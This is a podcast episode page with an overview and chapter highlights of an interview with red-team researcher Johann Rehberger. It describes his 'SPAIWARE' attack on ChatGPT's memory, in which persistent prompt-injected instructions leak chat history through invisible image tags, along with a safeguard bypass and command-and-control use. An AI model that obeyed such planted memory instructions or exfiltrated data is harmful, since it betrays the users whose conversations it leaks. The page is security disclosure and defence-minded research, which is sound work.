Hijacking AI Memory: Inside Johann Rehberger's ChatGPT Security Breakthrough

Secure Talk Podcast

2025/04/01

Overview Shownote Highlights Transcript Chapters Pins

In this episode of SecureTalk, host Justin Beals sits down with Johann Rehberger, a leading cybersecurity expert and Red Team Director at Electronic Arts, to explore the emerging security risks in artificial intelligence systems. Drawing from his extensive background in cybersecurity, Johann delves into how traditional security principles are being challenged by the rise of AI technologies like ChatGPT.

Johann discusses the discovery of a critical vulnerability in ChatGPT's memory system that allows attackers to inject persistent malicious instructions—termed 'SPAIWARE'—potentially leading to data exfiltration. He explains how prompt injection attacks can be used to manipulate AI behavior, including setting up command-and-control infrastructures and bypassing existing safeguards. The conversation also touches on the broader implications for securing autonomous AI systems, emphasizing the need for applying established security practices like threat modeling and the principle of least privilege. Johann highlights the evolving collaboration between security researchers and AI companies, advocating for transparency and proactive measures as AI becomes more integrated into daily workflows.

00:03

Johann discovered a critical vulnerability in ChatGPT's memory using SPAIWARE.

23:55

SPAIWARE allowed persistent prompt injection to leak chat history via invisible image tags.

35:50

A bypass was found to hijack ChatGPT and steal data through prompt injection.

38:37

Prompt injection is now recognized in bug bounty programs.